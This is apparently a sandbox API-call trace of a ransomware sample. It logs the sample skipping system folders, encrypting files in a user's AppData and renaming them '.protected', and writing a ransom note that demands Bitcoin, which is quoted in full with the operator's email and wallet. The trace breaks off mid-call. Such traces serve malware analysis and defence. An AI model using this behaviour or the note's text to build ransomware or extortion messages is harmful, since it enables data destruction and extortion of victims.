StrStrW (lpFirst="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".zip") returned 0x0 [0089.901] ReadFile (in: 
hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x3d, lpOverlapped=0x0) returned 1 [0089.901] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffc3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.902] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x3d, lpOverlapped=0x0) returned 1 [0089.902] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.902] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0089.902] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0089.902] CloseHandle (hObject=0x154) returned 1 [0089.902] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected") returned 197 [0089.902] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected")) returned 1 [0089.903] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.903] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.903] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\RESTORE_FILES.txt") returned 135 [0089.903] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.903] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.904] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.905] lstrlenA (lpString="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") returned 684 [0089.905] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 
[0089.905] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.905] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.905] CloseHandle (hObject=0x150) returned 1 [0089.905] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.905] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.905] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\RESTORE_FILES.txt") returned 88 [0089.905] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.906] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.906] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.906] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.906] WriteFile (in: hFile=0x14c, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.906] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.906] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.907] CloseHandle (hObject=0x14c) returned 1 [0089.908] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.908] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.908] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RESTORE_FILES.txt") returned 84 [0089.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.908] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.908] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.910] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.910] WriteFile (in: hFile=0xd8, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.910] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.910] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.910] CloseHandle (hObject=0xd8) returned 1 [0089.911] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.911] lstrcmpiW (lpString1="Document Building Blocks", lpString2="Windows") returned -1 [0089.911] lstrcmpiW (lpString1="Document Building Blocks", lpString2="Program Files") returned -1 [0089.911] lstrcmpiW (lpString1="Document Building Blocks", lpString2="Program Files (x86)") returned -1 [0089.911] lstrcmpiW (lpString1="Document Building Blocks", lpString2="$Recycle.bin") returned 1 [0089.911] lstrcmpiW (lpString1="Document Building Blocks", lpString2="System Volume Information") returned -1 [0089.911] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned 84 [0089.911] lstrcmpW (lpString1="Document Building Blocks", lpString2=".") returned 1 [0089.911] lstrcmpW (lpString1="Document Building Blocks", lpString2="..") returned 1 [0089.911] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*") returned 86 [0089.911] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.911] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.911] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.911] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.911] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.911] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.911] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\.") returned 86 [0089.912] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.912] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.912] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.912] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.912] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.912] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.912] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.912] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\..") returned 87 [0089.912] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.912] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.912] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.912] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0089.912] lstrcmpiW (lpString1="1033", lpString2="Program Files") returned -1 [0089.912] lstrcmpiW (lpString1="1033", lpString2="Program Files (x86)") returned 
-1 [0089.912] lstrcmpiW (lpString1="1033", lpString2="$Recycle.bin") returned 1 [0089.912] lstrcmpiW (lpString1="1033", lpString2="System Volume Information") returned -1 [0089.912] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned 89 [0089.912] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0089.912] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0089.912] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*") returned 91 [0089.912] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.912] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.912] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.912] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.912] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.912] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.913] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\.") returned 91 [0089.913] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.913] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.913] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.913] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.913] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.913] lstrcmpiW (lpString1="..", 
lpString2="$Recycle.bin") returned 1 [0089.913] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.913] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\..") returned 92 [0089.913] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.913] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.913] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.913] lstrcmpiW (lpString1="14", lpString2="Windows") returned -1 [0089.913] lstrcmpiW (lpString1="14", lpString2="Program Files") returned -1 [0089.913] lstrcmpiW (lpString1="14", lpString2="Program Files (x86)") returned -1 [0089.913] lstrcmpiW (lpString1="14", lpString2="$Recycle.bin") returned 1 [0089.913] lstrcmpiW (lpString1="14", lpString2="System Volume Information") returned -1 [0089.913] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14") returned 92 [0089.913] lstrcmpW (lpString1="14", lpString2=".") returned 1 [0089.913] lstrcmpW (lpString1="14", lpString2="..") returned 1 [0089.914] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\*") returned 94 [0089.914] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.914] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.914] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.914] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.914] 
lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.914] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.914] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\.") returned 94 [0089.914] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.914] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.914] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.914] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.914] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.914] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.914] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.914] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\..") returned 95 [0089.914] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.914] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.914] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.914] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="Windows") returned -1 [0089.914] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="Program Files") returned -1 [0089.914] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="Program Files (x86)") returned -1 [0089.914] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="$Recycle.bin") returned 1 [0089.914] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="System Volume Information") returned -1 [0089.914] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx") returned 122 [0089.915] StrStrIW (lpFirst="Built-In Building Blocks.dotx", lpSrch=".protected") returned 0x0 [0089.915] lstrcmpW (lpString1="Built-In Building Blocks.dotx", lpString2="RESTORE_FILES.txt") returned -1 [0089.915] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.915] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.915] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx") returned 122 [0089.915] StrStrW (lpFirst="Built-In Building Blocks.dotx", lpSrch=".txt") returned 0x0 [0089.915] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx") returned 122 [0089.915] StrStrW (lpFirst="Built-In Building Blocks.dotx", lpSrch=".rar") returned 0x0 [0089.915] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx") returned 122 [0089.915] StrStrW (lpFirst="Built-In Building Blocks.dotx", lpSrch=".zip") returned 0x0 [0089.916] 
ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0089.917] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.917] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0089.917] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.917] WriteFile (in: hFile=0x154, 